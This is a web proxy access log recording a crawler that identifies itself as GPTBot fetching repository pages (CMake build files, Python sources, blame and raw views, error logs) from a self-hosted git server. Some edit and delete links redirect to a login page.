"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:54:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35740] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11350] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13610] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:16:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:16:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:16:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:16:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46766] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:16:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:16:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:16:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:16:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:16:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 10001] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:16:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13536] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:16:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:16:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 12983] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:16:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 12953] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:16:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15552] [Gzip 7.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15484] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 34608] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 